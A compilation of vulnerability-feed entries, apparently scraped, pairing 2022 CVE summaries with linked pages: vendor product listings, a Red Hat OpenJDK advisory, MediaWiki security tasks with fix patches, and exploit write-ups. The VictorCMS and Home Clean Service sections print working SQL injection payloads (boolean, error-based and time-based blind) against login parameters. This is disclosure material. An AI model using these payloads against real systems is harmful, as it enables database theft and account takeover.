Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection.

**About Us**

We **Red Planet Computers** has started development in Laundry Management System in 2017. We have 7+ years experience in development, customization and implementation Web, Mobile application Services.

*   Well and Experienced Staff.
*   User Friendly Services
*   24x7 remote support servies

Our team have hands-on experience in all aspects of IT planning, deployment, operational management and maintenance support. Our design consultants design solutions that fit best within your environment and help achieve your laundry business goals – working with you as trusted advisors to help determine the best solution for your laundry business.

See More

**Development Skills**

**Laundry Management System Developed in following skills**

Our professional and experience developers team are used skill to the top most computer launguages and framworks for ui design, developement, making user friendly and secure laundry application for small business.

Boostrap & CSS _Website and Admin UI Design_

Javascript & Ajax _Website Development_

PHP Codeigniter & Mysqli _Website and Admin Panel_

Flutter, Swift and Kotlin _Android, iOS Mobile App_

**Screenshots**

Here some application UI screens to help you how its look and work LMS Application

*   Admin
*   Website
*   Mobile

**Pricing**

**RPL Standard Package  
(Point Of Sale\*)****INR 25K USD $349/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS Screen Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI
*   One Year Free Service & Updates.

Buy Now

**RPL Professional Package  
(E-Commerce\*)****INR 45K USD $599/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS+E-Comm Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)
*   One Year Free Service & Updates.

Buy Now

**RPL Development Package  
(Customization\*\*)****Extra 50% POS+50% (OR) E-Commerce+50%**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS/E-Commerce Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)         \[ as per your requirements\*\* \]
*   One Year Free Service & Updates.

Buy Now

\* Terms and Conditions apply (see FAQ section )  
\*\* Cost may vary depends on the customization

**Frequently Asked Questions**

Here are some of the most Frequently Asked Questions for Laundry Management Systems.

*   Can we get all liceses for lifetime ?
    
    Ans : Yes, if you purchase application with full source code then it's one-time payment and you will get multiple digital license \[lifetime\]. The amount is non-refundable , Once if you have got full source code then you will not getting return amount for any circumstances.
    
*   After purchase full source code can we sell this software ?
    
    Ans : Yes, after purchase application with full source code then you can use or sell anywhere with remove red planet computers company logo and name.
    
*   Can you will provide full source code ?
    
    Ans : Yes, you should have to pay 100% amount, if you want application with full source code. We will send full source code (zip or download link ) within half hours after successfully payment done. We will not provide any kind of equipment. Only RPL Business Package we will not provide source files.
    
*   What is **RPL Development / Customization Package** ?
    
    Ans : If you want manipulation or any changes in application through our professional developer team then you will have to pay selected (standard or professional) package amount plus extra 50% amount for manipulation charges. **Firstly, you have to pay 70% amount of total amount** and remaining 30% amount to pay after project completed, but note that in this period you will not getting full source code, you will getting our web hosting softwares link for testing, after completed project and 100% payment done then we will upload full source code in your website/web hosting server or send full source code link).  
    \- As per your requirement, project will be completed within 20-25 days or earlier.  
    \- Bulk SMS, Payment Gateway, Apple App Store, Google Map API & Play Store Console charges you will have to pay, if you are require.
    
*   Service and Support ?
    
    Ans : We will provide a FREE technical support upto one year after purchase LMS Application. We will answer your question regarding website management, technical details or anything about operating your own website; we can provide this through remotly in 24x7 Hours.
    

**Free Trail Full Version**

Not required fill any personal information or credit card details just click on button and login it

Username : admin  
Password : 1234  
\[ Admin Login Details \]

  
Best view in Desktop or Laptop

Mobile : 8767228990  
Password : 1983  
\[ Demo User Login Details \]

  
Best view in Desktop or Laptop

User Mobile : 8767228990  
Driver Mobile : 1234567890  
\[ Demo User / Driver Login Details \]

   
iOS app install : Download and Extract zip in Mac-OS then drag-drop .app file on Xcode 10+ simulator or connected iphone {iOS v10.0+}.

**Contact**

You can call to us 24x7 regarding Laundry Management System enquiry or solutions

**Location:**

B-02, Sai Sanklap Complex, Survey No. 145/0,  
Usarli Khurd, Panvel, Mumbai, India 410206

**Call:**

Mobile : +91 87672 28990.  
Whatsapp : +91 87672 28990.  
Skype : rpcits2013 / +918767228990.

CVE-2022-28452: Better solutions for Small Laundry and Dry Cleaning Business

Red Hat Security Advisory 2022-1436-01 - The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. This release of the Red Hat build of OpenJDK 17 for portable Linux serves as a replacement for the Red Hat build of OpenJDK 17 and includes security and bug fixes, and enhancements.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Important: OpenJDK 17.0.3 security update for Portable Linux BuildsAdvisory ID:       RHSA-2022:1436-01Product:           OpenJDKAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:1436Issue date:        2022-04-28CVE Names:         CVE-2022-21426 CVE-2022-21434 CVE-2022-21443                   CVE-2022-21449 CVE-2022-21476 CVE-2022-21496====================================================================1. Summary:The Red Hat build of OpenJDK 17 (java-17-openjdk) is now available forportable Linux.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.2. Description:The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment andthe OpenJDK 17 Java Software Development Kit.This release of the Red Hat build of OpenJDK 17 (17.0.3) for portable Linuxserves as a replacement for the Red Hat build of OpenJDK 17 (17.0.2) andincludes security and bug fixes, and enhancements. For further information,refer to the release notes linked to in the References section.Security Fix(es):* OpenJDK: Unbounded memory allocation when compiling crafted XPathexpressions (JAXP, 8270504) (CVE-2022-21426)* OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)(CVE-2022-21443)* OpenJDK: Improper object-to-string conversion inAnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)* OpenJDK: Defective secure validation in Apache Santuario (Libraries,8278008) (CVE-2022-21476)* OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)* OpenJDK: Improper ECDSA signature verification (Libraries, 8277233)(CVE-2022-21449)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying this update, make sure all previously-released erratarelevant to your system have been applied.For details on how to apply this update, refer to:https://access.redhat.com/documentation/en-us/openjdk/17/html/installing_and_using_openjdk_17_on_rhel/installing-openjdk11-on-rhel8_openjdk#installing-jdk11-on-rhel-using-archive_openjdk4. Bugs fixed (https://bugzilla.redhat.com/):2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)2075821 - CVE-2022-21449 OpenJDK: Improper ECDSA signature verification (Libraries, 8277233)2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)5. References:https://access.redhat.com/security/cve/CVE-2022-21426https://access.redhat.com/security/cve/CVE-2022-21434https://access.redhat.com/security/cve/CVE-2022-21443https://access.redhat.com/security/cve/CVE-2022-21449https://access.redhat.com/security/cve/CVE-2022-21476https://access.redhat.com/security/cve/CVE-2022-21496https://access.redhat.com/security/updates/classification/#important6. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBYmsX/NzjgjWX9erEAQiNsw//avZlFkUgXnhSy/6zO6tRFmvkczPDR3dgtCVtxdrd8w46/paI/RDc5FWd9CqCVQgBIEqdiwUYBEFSIU9V9dv9bPYSBsK4+CeusT9oZc7Cb7fe/HNrh5L1mKALdFt1DTfyB/1pKyIrvLWL1yK3Nu9AHnTeoTRN+x9i/+AYi0GYWDU3Wh6XPjXz2BLSga50I1uoX2yRWuXUvns+vO7Hljzp+NwbJ0ANhTaEPABxJePijWUgvPklFZscq20ETytmbggtWGEiOyKi/xzpXbatt/CW1nizSNcdTklz5WB5qvAbqq2N6BjSEE1A5fc82Q2UFqX9RVvRksCKj72PxMyqmbxaX4znvphPXry/Z4phVJi3FIWJKBVGuOQQ/tro7KohElmPZueuSHsgUlq/fJovI5uT3ha7JHl7KmcTXxtAzQFtJFPAWeUKYfMGeRovYVZFQrTtbZWpya0H+ERi5NgBnhMmCY56qxbENeVvpyWUV1Hc8c/Se8oAdyrgd5OdknXzTcea4vs9qG+HfNArOLeDqzyBsxF+zv5O7+sZNIk6BZJKtMEFoE4BV/oUji1n9PBQgZRwIVSj0vKWUgXl50uMfclkmyaOVs09sbZ/DdKzMvQafcAyUX5fZnUfQc4fvXH/PAVcdLnEO6Op4BIEuMClYV3Mf/lG2z/yi5WrnFsnAwYpBrM=miaH-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1436-01

The admin API module in the QuizGame extension for MediaWiki through 1.37.2 (before 665e33a68f6fa1167df99c0aa18ed0157cdf9f66) omits a check for the quizadmin user.

**

QuizGame: Administrative API module lets unauthenticated requests through

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

In 88754ee5b7c7f745f1172cf0238f8e65442e1bd0 (27 July 2013 (!)) I converted QuizGame to use an API module instead of the then-deprecated sajax\_\* functions provided by MediaWiki core to make the extension compatible with MediaWiki 1.21.  
The old AJAX entry point, wfQuestionGameAdmin, which despite the name **wasn't** admin-only nor truly intended to be such as it handles flagging, did feature a rudimentary "is the request allowed?" check; but I'm not sure if it really provided any _real_ security. Either way, when creating the API module, even this check was lost.

So right now all the API module really cares about is that:  
1.) The request has a valid anti-CSRF token (new mw.Api().postWithEditToken( ... ) will take care of that)  
2.) The request was POSTed  
3.) The quizaction and id parameters are set and that the former corresponds to one of the actions handled by the module's switch() loop

As long as those requirements are met, an attacker can easily abuse the QuizGame administrative API to their nefarious purposes - quizadmin rights not needed!

Hilariously, though, the UI in /extensions/QuizGame/includes/specials/SpecialQuizGameHome.php **does** perform correct user right checks for the admin panel and whatnot and redirects unauthorized users to the main quiz game landing page.

Quick patch to add block and proper user rights checking to the QuizGame admin API (while allowing all users to flag quizzes):

diff --git a/includes/api/ApiQuizGame.php b/includes/api/ApiQuizGame.php
index 3236d7e..56d5a82 100644
\--- a/includes/api/ApiQuizGame.php
+++ b/includes/api/ApiQuizGame.php
@@ -34,6 +34,21 @@ class ApiQuizGame extends ApiBase {
                // ApiBase's getDB() supports only slave connections, lame...
                $dbw = wfGetDB( DB\_PRIMARY );
 
\+               // Fail early if the user is sitewide blocked.
\+               // (This snippet copied from MW core /includes/api/ApiTag.php)
\+               $block = $user->getBlock();
\+               if ( $block && $block->isSitewide() ) {
\+                       $this->dieBlocked( $block );
\+               }
+
\+               // Allow non-quizadmins to use the flagging feature but require quizadmin
\+               // rights for all other stuff
\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }
+
                switch ( $action ) {
                        case 'unprotectItem':
                                $dbw->update(

*   Mentions

**Event Timeline**

Comment Actions

From 26cab2b8ca3fba27849c7453f48b7f9189e89fc9 Mon Sep 17 00:00:00 2001
From: www-data <www-data@miraheze.org>
Date: Mon, 21 Feb 2022 22:06:16 +0000
Subject: \[SECURITY\] QuizGame: Administrative API module lets
 unauthenticated requests through

\---
 includes/api/ApiQuizGame.php | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/includes/api/ApiQuizGame.php b/includes/api/ApiQuizGame.php
index 3236d7e..081e64e 100644
\--- a/includes/api/ApiQuizGame.php
+++ b/includes/api/ApiQuizGame.php
@@ -34,6 +34,21 @@ class ApiQuizGame extends ApiBase {
 		// ApiBase's getDB() supports only slave connections, lame...
 		$dbw = wfGetDB( DB\_PRIMARY );
 
\+               // Fail early if the user is sitewide blocked.
\+               // (This snippet copied from MW core /includes/api/ApiTag.php)
\+               $block = $user->getBlock();
\+               if ( $block && $block->isSitewide() ) {
\+                       $this->dieBlocked( $block );
\+               }
+
\+               // Allow non-quizadmins to use the flagging feature but require quizadmin
\+               // rights for all other stuff
\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }
+
 		switch ( $action ) {
 			case 'unprotectItem':
 				$dbw->update(
\-- 
2.30.2

didn't apply for me, ended up working with sudo -u www-data git apply --ignore-space-change --ignore-whitespace ~/quizgame.patch

That's the new patch file

Comment Actions

The patch looks correct to me, +2. One nit:

\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }

These two if blocks can be merged: if ( $action !== 'flagItem' && !$user->isAllowed( 'quizadmin' ) ).

(Aso in the future it's better to post patches as attachments generated with git format-patch HEAD~1, so that any weird whitespace, etc. are preserved.)

Also, also, I noticed that SpecialQuizGameHome is checking for \*any\* block, not a sitewide block. That can be fixed publicly, I just looked because you mentioned it implemented the checks correctly.

ashley closed this task as Resolved.Mar 28 2022, 5:13 PM

Comment Actions

Finally closing this as the patch was merged about a month ago (oops). @Legoktm's note regarding Special:QuizGameHome is worth investigating, but that's a separate matter altogether. (Social-Tools basically have no knowledge and thus no support for the concept of partial blocks; you're either blocked or not, social tools don't currently care about how partial the block is.)

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-29906: Administrative API module lets unauthenticated requests through

The FanBoxes extension for MediaWiki through 1.37.2 (before 027ffb0b9d6fe0d823810cf03f5b562a212162d4) allows Special:UserBoxes CSRF.

**

FanBoxes: classic CSRF in Special:UserBoxes

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Special:UserBoxes, the special page used to create new social user boxes and edit existing ones (pages in the UserBox: namespace), does not check for the presence of an anti-CSRF token, it will happily create/update the requested page as long as the request was POSTed and the desired form fields are set.

Quick patch:

diff --git a/includes/specials/SpecialFanBoxes.php b/includes/specials/SpecialFanBoxes.php
index aac26be..7835e2d 100644
\--- a/includes/specials/SpecialFanBoxes.php
+++ b/includes/specials/SpecialFanBoxes.php
@@ -115,6 +115,7 @@ class FanBoxes extends SpecialPage {
                        $output .= Html::hidden( 'textColorLeftSideColor', $update\_fan->getFanBoxLeftTextColor(), \[ 'id' => 'textColorLeftSideColor' \] ) . "\\n";
                        $output .= Html::hidden( 'bgColorRightSideColor', $update\_fan->getFanBoxRightBgColor(), \[ 'id' => 'bgColorRightSideColor' \] ) . "\\n";
                        $output .= Html::hidden( 'textColorRightSideColor', $update\_fan->getFanBoxRightTextColor(), \[ 'id' => 'textColorRightSideColor' \] ) . "\\n";
\+                       $output .= Html::hidden( 'wpEditToken', $user->getEditToken() );
 
                        $fantag\_image\_tag = '';
                        if ( $update\_fan->getFanBoxImage() ) {
@@ -254,6 +255,8 @@ class FanBoxes extends SpecialPage {
                        <input type="hidden" name="bgColorRightSideColor" id="bgColorRightSideColor" value="" />
                        <input type="hidden" name="textColorRightSideColor" id="textColorRightSideColor" value="" />';
 
\+                       $output .= Html::hidden( 'wpEditToken', $user->getEditToken() );
+
                        if ( !$destination ) {
                                $output .= '<h2 class="fanbox-form-label">' . $this->msg( 'fanbox-title' )->escaped() . '</h2>
                                        <div class="create-fanbox-title">
@@ -330,6 +333,13 @@ class FanBoxes extends SpecialPage {
 
                // Send values to database and create fantag page when form is submitted
                if ( $request->wasPosted() ) {
\+                       // Protect against CSRF
\+                       if ( !$user->matchEditToken( $request->getVal( 'wpEditToken' ) ) ) {
\+                               $out->addWikiMsg( 'sessionfailure' );
\+                               $out->addReturnTo( $this->getPageTitle() );
\+                               return;
\+                       }
+
                        if ( !$fanboxId ) {
                                // @phan-suppress-next-line PhanTypeMismatchArgumentNullable
                                $fan = FanBox::newFromName( $title );

**Event Timeline**

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-29905: ⚓ T306741 FanBoxes: classic CSRF in Special:UserBoxes

zend-diactoros (and, by extension, Expressive), zend-http (and, by extension, Zend Framework MVC projects), and zend-feed (specifically, its PubSubHubbub sub-component) each contain a potential URL rewrite exploit. In each case, marshaling a request URI includes logic that introspects HTTP request headers that are specific to a given server-side URL rewrite mechanism.

When these headers are present on systems not running the specific URL rewriting mechanism, the logic would still trigger, allowing a malicious client or proxy to emulate the headers to request arbitrary content.

**Package**

composer zendframework/zend-diactoros (Composer )

**Affected versions**

< 1.8.4

**Package**

composer zendframework/zend-feed (Composer )

**Affected versions**

< 2.10.3

**Package**

composer zendframework/zend-http (Composer )

**Affected versions**

< 2.8.1

**Description**

zend-diactoros (and, by extension, Expressive), zend-http (and, by extension, Zend Framework MVC projects), and zend-feed (specifically, its PubSubHubbub sub-component) each contain a potential URL rewrite exploit. In each case, marshaling a request URI includes logic that introspects HTTP request headers that are specific to a given server-side URL rewrite mechanism.

When these headers are present on systems not running the specific URL rewriting mechanism, the logic would still trigger, allowing a malicious client or proxy to emulate the headers to request arbitrary content.

**References**

*   https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-diactoros/ZF2018-01.yaml
*   https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-feed/ZF2018-01.yaml
*   https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-http/ZF2018-01.yaml

GHSA-f6p5-76fp-m248: URL Rewrite vulnerability in multiple zendframework components

SQL Injection vulnerability in Victor CMS v1.0, via the user_name parameter to /includes/login.php.

Permalink

*   VULNERABLE: SQL injection vulnerability exists in VictorCMS . An attacker can inject query in “/CMSsite/includes/login.php" via the "user\_name" parameters.
*   Product: Victor CMS v1.0
*   Impact: Allow attacker inject query and access , disclosure of all data on the system.
*   Payload Boolean true: test' or '1'='1
*   Payload Boolean false: test' or '1'='2
*   Payload exploit example: test' or (ascii(substr((select(database())),1,1))<127)--+-
*   Proof of concept (POC):

*   You see Whether the user name is correct or not, the response status of the returned package is different
*   Payload Boolean true: user\_name=test'+or+'1'='1

*   Payload Boolean false: user\_name=test'+or+'1'='2

*   Exploit:

CVE-2022-28060: CVE/VictorCMS SQL.md at main · JiuBanSec/CVE

Limbas 4.3.36.1319 is vulnerable to Cross Site Scripting (XSS).

Like Access, from basic features such as table management, form and report generator as well as charting and workflow features it can be dynamically modeled with one another to any product solution. Limbas is based on PHP.

**Features**

*   quickly create webbased applications
*   completly webbased for allmost all browsers
*   easy to use graphical userinterface
*   graphical wizzards for building views, forms and reports
*   support of many databases like maxdb, postgresql, ingres, mssql
*   Administration tools for backup and export, rulemanagement, triggers and more
*   integrated filemanager with DMS functionality
*   integrated ajax-based calendar
*   reminder functionality with sending reminders to users or groups
*   recursiv versioning of datasets and files
*   support SOAP and WEBDAV interfaces
*   YII-Framework connection class for limbas

**License**GNU General Public License version 2.0 (GPLv2)

Other Useful Business Software

Discover HPCC Systems - the truly open source big data solution that allows you to quickly process, analyze and understand large data sets, even data stored in massive, mixed-schema data lakes. Designed by data scientists, HPCC systems is a complete integrated solution from data ingestion and data processing to data delivery. The free online introductory courses and a robust developer community allow you to get started quickly.

**User Ratings**

5.0 out of 5 stars

★★★★★

★★★★

★★★

★★

★

ease 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

features 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

design 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

support 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

**User Reviews**

*   All
*   ★★★★★
*   ★★★★
*   ★★★
*   ★★
*   ★

*   1 user found this review helpful.
    
*   A powerful system very flexible and easy to handle. Using a browser to access LIMBAS gives you the possibility to work from any location and device. No license fees.
    
*   looks like the answer of my prayers :-)
    

Read more reviews >

**Additional Project Details**

**Languages**French, English, German

**Intended Audience**Information Technology, Developers, End Users/Desktop

**User Interface**Web-based

**Programming Language**PHP

**Database Environment**Other network-based DBMS, ODBC

**Registered**

2006-01-04

CVE-2022-28454: Limbas

Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) in Shea Bunge's Footer Text plugin <= 2.0.3 on WordPress.

This plugin **hasn’t been tested with the latest 3 major releases of WordPress**. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

Provides an interface in the dashboard, similar to the post edit screen, that allows you to easily change the text displayed in the footer on the front-end. After installing the plugin, add the footer_text() template tag to your footer.php theme template where you want the text to display. For more options, see the FAQ.

You can use these shortcodes in the footer text editor:

*   [last_modified] the date that the current page was last modified on
*   [page_link] the full permalink of the current page, formatted. The content wrapped in this shortcode will be used as the link text
*   [year] the current year eg: 2013

Visit the plugin homepage, or contribute to its development at GitHub.

**Screenshots**

**Installation**

1.  Upload the footer-text directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Visit _Appearance > Footer Text_ to write your awesome footer text
4.  Place the footer_text() template tag somewhere in your theme where you want the text displayed
5.  Visit site. Observe.

**FAQ**

**How can I display the footer text in my theme?**

You can use the footer_text() function to display the footer text, or the get_footer_text() function to return it for use in PHP. These template tags should generally be used in the footer.php file of your theme.

The footer_text() function outputs the formatted footer text and accepts three parameters: $before, $after and $default. $before will be outputted _before_ the text, $after will be outputted _after_ the text, and $default will be used instead of the text is none is set. If no text is set $default is empty, nothing will be displayed.

The get_footer_text() function returns the formatted footer text and accepts one parameter: $default, which will be returned if no text is set.

If the plugin isn’t active, the template tag will result in an error. To solve this, you can use an action hook instead:

    do_action( 'footer_text', $default, $before, $after );
    

This works the same as calling the footer_text() function, and any of the three arguments can be omitted.

**Reviews**

Erik September 3, 2016

It still does the trick, even in 4.4!

mojen September 3, 2016

Does exactly what it says on the tin. It works with Insert Pages shortcodes as well. Thank you!

Read all 6 reviews

**Contributors & Developers**

“Footer Text” is open source software. The following people have contributed to this plugin.

Contributors

*    Shea Bunge

**Changelog****2.0.3**

*   Added a message when the text is updated.

**2.0.2**

*   Use a <h1> heading on administration pages

**2.0.1**

*   Update screenshots for WordPress 3.9
*   Add braces to one-line conditionals

**2.0.0**

*   Delete footer text from database on uninstall
*   Added an action as an alternate way to display footer text
*   Restructured code
*   Fixed \[page\_link\] shortcode
*   Added custom ‘edit\_footer\_text’ capability
*   Added support for translations

**1.0.0**

*   Initial release

CVE-2022-27860: Footer Text

Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Home Clean Service System v1.0 - 2022 SQLi## Author: nu11secur1ty## Date: 04.27.2022## Vendor: https://www.sourcecodester.com/users/acetech## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the password parameter, and a databaseerror message was returned.Two single quotes were then submitted and the error message disappeared.The attacker can take administrator account control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: MULTIPART email ((custom) POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx--    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECTCOUNT(*),CONCAT(0x7176716271,(SELECT(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx--    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM(SELECT(SLEEP(5)))kgBM)-- GxTm------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx-----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)## Proof and Exploit:[href](https://streamable.com/l107o6)

Home Clean Service System 1.0 SQL Injection

DSCMS v3.0 was discovered to contain an arbitrary file deletion vulnerability via /controller/Adv.php.

**Arbitrary file deletion vulnerability**

**评论 (0)**

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120303\_a26bb592\_9830429.jpeg "112.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124119\_947e90b5\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124119\_947e90b5\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

